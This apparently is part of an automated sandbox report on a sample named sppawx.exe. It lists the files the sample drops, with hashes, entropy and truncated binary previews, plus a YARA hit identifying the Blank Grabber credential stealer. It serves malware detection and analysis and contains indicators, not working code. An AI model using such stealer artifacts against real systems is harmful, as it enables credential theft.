Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.930038440560372
Encrypted:	false
SSDEEP:	3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
MD5:	6EDA5A055B164E5E798429DCD94F5B88
SHA1:	2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
SHA-256:	377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
SHA-512:	74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1826072
Entropy (8bit):	7.993990461497291
Encrypted:	true
SSDEEP:	49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
MD5:	86D9B8B15B0340D6EC235E980C05C3BE
SHA1:	A03BDD45215A0381DCB3B22408DBC1F564661C73
SHA-256:	12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
SHA-512:	D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................m.................x...s...x......x......x......Rich............PE..d...=..e.........." ...#.........@Q...l..PQ...................................m...........`.........................................H/l......)l...... l......``..V............l. ...........................0.l.(...p.l.@...........................................UPX0.....@Q.............................UPX1.........PQ.....................@....rsrc........ l.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.448215150146329
Encrypted:	false
SSDEEP:	768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
MD5:	CCE3E60EC05C80F5F5EE014BC933554C
SHA1:	468D2757B201D6259034215CFD912E8E883F4B9E
SHA-256:	84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
SHA-512:	7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q\|'.q\|'.q\|'...'.q\|'q.}&.q\|'q.y&.q\|'q.x&.q\|'q..&.q\|'..}&.q\|'.q}'.q\|'..}&.q\|'..q&.q\|'..\|&.q\|'...'.q\|'..~&.q\|'Rich.q\|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637720
Entropy (8bit):	7.993319352541641
Encrypted:	true
SSDEEP:	12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
MD5:	C6ED91B8FDB99EBA4C099EB6D0EEA5D9
SHA1:	915B2D004F3F07CD18610E413B087568258DA866
SHA-256:	E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
SHA-512:	92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302872
Entropy (8bit):	7.986491235737331
Encrypted:	false
SSDEEP:	6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
MD5:	427668E55E99222B3F031B46FB888F3A
SHA1:	C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
SHA-256:	9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
SHA-512:	E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ddgslo2.rgi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fxw14ft.mqt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mqskh3l.ptn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3se5nk5.kxm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5xe250w.p4g.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emzt4hro.ggv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epjhr4c1.km2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fyxe1jq3.n2o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpm0vpyw.z20.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guzosq3c.xcd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3g1fiid.qwl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksn13s0d.k2s.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltpbjbea.llt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lweqhww1.gzr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m154zayi.4ca.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtcn0k13.0za.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pltcl5iq.zh5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qy2lhb2a.uvs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rei54syc.myi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rn1cwbk5.n42.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uygak3dl.hol.psm1

Download File

